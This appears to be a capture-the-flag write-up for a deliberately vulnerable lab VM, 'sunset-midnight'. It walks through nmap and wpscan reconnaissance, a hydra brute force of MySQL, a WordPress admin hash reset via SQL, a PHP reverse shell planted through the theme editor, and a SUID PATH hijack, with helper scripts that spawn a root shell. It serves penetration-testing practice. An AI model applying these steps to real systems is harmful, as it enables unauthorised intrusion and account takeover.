Host discovery

sudo nmap -sn 192.168.162.0/24

Port scanning

sudo nmap --min-rate 10000 -p- 192.168.162.147 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 11:24 CST
Nmap scan report for 192.168.162.147
Host is up (0.00046s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:2C:C9:48 (VMware)
sudo nmap -sT -sV -sC -O -p22,80,3306 192.168.162.147  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 11:25 CST
Nmap scan report for 192.168.162.147
Host is up (0.00046s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:fe:0b:8b:8d:15:e7:72:7e:3c:23:e5:86:55:51:2d (RSA)
| 256 fe:eb:ef:5d:40:e7:06:67:9b:63:67:f8:d9:7e:d3:e2 (ECDSA)
|_ 256 35:83:68:2c:33:8b:b4:6c:24:21:20:0d:52:ed:cd:16 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: Did not follow redirect to http://sunset-midnight/
|_http-server-header: Apache/2.4.38 (Debian)
3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
| Thread ID: 16
| Capabilities flags: 63486
| Some Capabilities: FoundRows, LongColumnFlag, InteractiveClient, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, SupportsTransactions, Speaks41ProtocolOld, IgnoreSigpipes, Speaks41ProtocolNew, Support41Auth, ODBCClient, SupportsCompression, ConnectWithDatabase, DontAllowDatabaseTableColumn, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: q>#3vy{#6$SU12HSHN2M
|_ Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:2C:C9:48 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo nmap --script=vuln -p22,80,3306 192.168.162.147
[sudo] password for mikannse:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 11:25 CST
Nmap scan report for 192.168.162.147
Host is up (0.00038s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-wordpress-users:
| Username found: admin
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /blog/: Blog
| /wp-login.php: Possible admin folder
| /wp-json: Possible admin folder
| /robots.txt: Robots file
| /readme.html: Wordpress version: 2
| /feed/: Wordpress version: 5.4.2
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
| /readme.html: Interesting, a readme.
| /0/: Potentially interesting folder
| /contact/: Potentially interesting folder
|_ /home/: Potentially interesting folder
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:2C:C9:48 (VMware)

Web

The site cannot be opened by IP directly: it redirects to http://sunset-midnight/ (see the http-title line in the nmap output), so the hostname has to be resolved locally by adding 192.168.162.147 sunset-midnight to /etc/hosts.

It is reachable now, but the page loads very slowly.

It is a WordPress site.

Run a quick directory scan and look at every directory. The login page reveals whether an account exists (WordPress returns different errors for an unknown username and for a wrong password), so enumerate users, plugins and themes with wpscan:

wpscan --url http://sunset-midnight/ --enumerate vp,vt,tt,u

An admin user is found; try brute forcing its password.

Nothing from rockyou works against the login. Since 3306 is exposed to the network, try brute forcing MySQL instead:

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.162.147 mysql -t 4

This gives the password robert for root.

Connect to the database remotely with root/robert. There is a WordPress database; it yields admin's password hash, but that does not crack either. Hmm, then why not just change the password? Set it to 123456:

UPDATE wp_users SET user_pass="e10adc3949ba59abbe56e057f20f883e" WHERE ID=1;

e10adc3949ba59abbe56e057f20f883e is the plain MD5 of 123456. WordPress still accepts an unsalted MD5 in user_pass as a legacy format and silently rehashes it with phpass on the next successful login, so there is no need to generate a phpass hash.
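The reset as a reusable helper, added here as an example (not part of the original writeup): it computes the MD5 WordPress accepts for any password and emits a SELECT to save the current hash, the UPDATE, and a SELECT to verify it. It assumes the default wp_ table prefix; DBNAME in the usage line is a placeholder for the WordPress database found on the box.

```shell
#!/bin/sh
# Added example, not from the original writeup: WordPress password reset via
# direct database access. WordPress accepts a bare MD5 in wp_users.user_pass
# (legacy format) and upgrades it to phpass on the next successful login.
# Assumed: table prefix wp_, mysql client credentials from the hydra run.

# Unsalted MD5 of a password, exactly what goes into user_pass.
wp_md5() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# SQL to record the current hash (so it can be restored afterwards),
# reset it, and verify the change for the given login name.
wp_reset_sql() {
    login="$1"
    hash="$(wp_md5 "$2")"
    cat <<EOF
SELECT ID, user_login, user_pass FROM wp_users WHERE user_login='$login';
UPDATE wp_users SET user_pass='$hash' WHERE user_login='$login';
SELECT ID, user_login, user_pass FROM wp_users WHERE user_login='$login';
EOF
}

# Usage on the target (DBNAME is a placeholder for the WordPress database):
#   wp_reset_sql admin 123456 | mysql -h 192.168.162.147 -u root -probert DBNAME
```

Keep the hash printed by the first SELECT: writing it back restores the original credential once the engagement is done.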

Getshell

Login succeeds, and the rest is the usual routine: Appearance > Theme Editor, replace the theme's index.php with a PHP reverse shell. But saving the file fails with: Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.

That error comes from the loopback request WordPress makes to check for fatal errors, and it only runs when editing the active theme. Pick twentytwenty (an inactive theme) from the "Select theme to edit" dropdown in the top right and the update goes through; Apache still serves the file directly.

Browse to

http://sunset-midnight/wp-content/themes/twentytwenty/index.php

Shell obtained, and there is a user jose. wp-config.php holds jose's database password, 645dc5a8871d2a4269d4cbe23f6ae103. I first took it for an MD5 hash that would need cracking, but it is the literal password, and jose reuses it for the system account, so it logs in directly.

Privilege escalation

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

This turns up /usr/bin/status. Loading it in IDA shows it runs service by name rather than by absolute path, so it is the familiar environment-variable (PATH) hijack: the SUID binary inherits the caller's PATH, so a writable directory prepended to PATH that contains our own service gets executed as root. I went through this on the previous box, so I won't repeat it here.
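The hijack spelled out, as an added example (not from the original writeup): drop a fake service into a writable directory, prepend that directory to PATH, and confirm that a relative lookup of service now resolves to the fake one, which is what /usr/bin/status will execute. The directory /tmp/hijack in the usage line is an assumption.

```shell
#!/bin/sh
# Added example, not from the original writeup: PATH hijacking of a SUID
# binary (/usr/bin/status) that calls "service" without an absolute path.

# Create a fake "service" in a writable directory and return its path.
make_fake_service() {
    dir="$1"
    mkdir -p "$dir"
    cat > "$dir/service" <<'EOF'
#!/bin/sh
# Launched by a SUID-root program, so spawn a root shell.
# -p keeps the effective uid; without it bash drops privileges.
exec /bin/bash -p
EOF
    chmod +x "$dir/service"
    printf '%s\n' "$dir/service"
}

# Resolve "service" the way a relative lookup would once the directory is
# prepended to PATH, i.e. show what the SUID binary would actually run.
resolve_service_with() {
    ( PATH="$1:$PATH"; command -v service )
}

# Usage on the target (assumed directory /tmp/hijack):
#   make_fake_service /tmp/hijack
#   resolve_service_with /tmp/hijack        # prints /tmp/hijack/service
#   PATH=/tmp/hijack:$PATH /usr/bin/status  # runs the fake service as root
```

The check matters because the hijack only works if the binary inherits the caller's PATH; a status binary that hard-coded /usr/sbin/service or reset the environment would resolve the real one regardless of what is prepended.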

Ramblings

All familiar elements again, nothing much to add, lol